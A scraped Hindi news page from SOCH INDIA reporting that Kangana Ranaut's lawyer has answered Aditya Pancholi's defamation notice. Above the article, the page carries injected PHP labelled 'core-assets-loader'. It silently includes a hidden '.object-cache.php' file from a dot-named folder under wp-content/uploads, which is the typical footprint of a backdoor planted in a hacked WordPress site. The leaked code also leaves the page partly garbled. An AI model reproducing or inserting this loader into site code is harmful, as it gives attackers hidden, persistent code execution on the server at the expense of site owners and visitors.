add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मानहानि मामले में कंगना के वकील ने आदित्य पंचोली को भेजा नोटिस का जवाब – SOCH INDIA
Menu

मनोरंजन
मानहानि मामले में कंगना के वकील ने आदित्य पंचोली को भेजा नोटिस का जवाब

nobanner

अपमानजनक टिप्पणियों को लेकर अभिनेत्री कंगना रनौत और आदित्य पंचोली के बीच कानूनी लड़ाई छिड़ गई है. कंगना ने एक टीवी चैनल के कार्यक्रम में सार्वजनिक रूप से आदित्य पंचोली पर कुछ आरोप लगाए थे, जिसके बाद अभिनेता ने उन्हें मानहानि का नोटिस भेजा था.

अब उस नोटिस का जवाब अभिनेत्री के वकील रिजवान सिद्दीकी ने दिया है. फिल्म ‘सिमरन’ की अभिनेत्री ने अभिनेता के साथ अपने रिश्तों और जिस शारीरिक व मानसिक पीड़ा से वह गुजरी हैं, उसका खुलासा किया था.

बता दें कि सिद्दीकी को 26 सितंबर को यह नोटिस मिला और उन्होंने शनिवार को इसका जवाब भेजा.

सिद्दीकी ने अपने बयान में कहा, “आदित्य पंचोली और जरीना वहाब के वकील की तरफ से मिले मानहानि के नोटिस का उचित जवाब दिया गया है. मेरी मुवक्किल जो अपराध की शिकार रही हैं, उन्होंने पहले से ही साल 2007 से विभिन्न मीडिया प्लेटफॉर्म पर बेबाकी से अपनी निजी जिंदगी के बारे में बोला है.”

उन्होंने कहा कि देश के कानून के अलावा किसी पीड़ित महिला को मानहानि का दावा करने की धमकी देकर उसे चुप कराने का कोई अतिरिक्त लाभ किसी पुरुष को नहीं मिला है.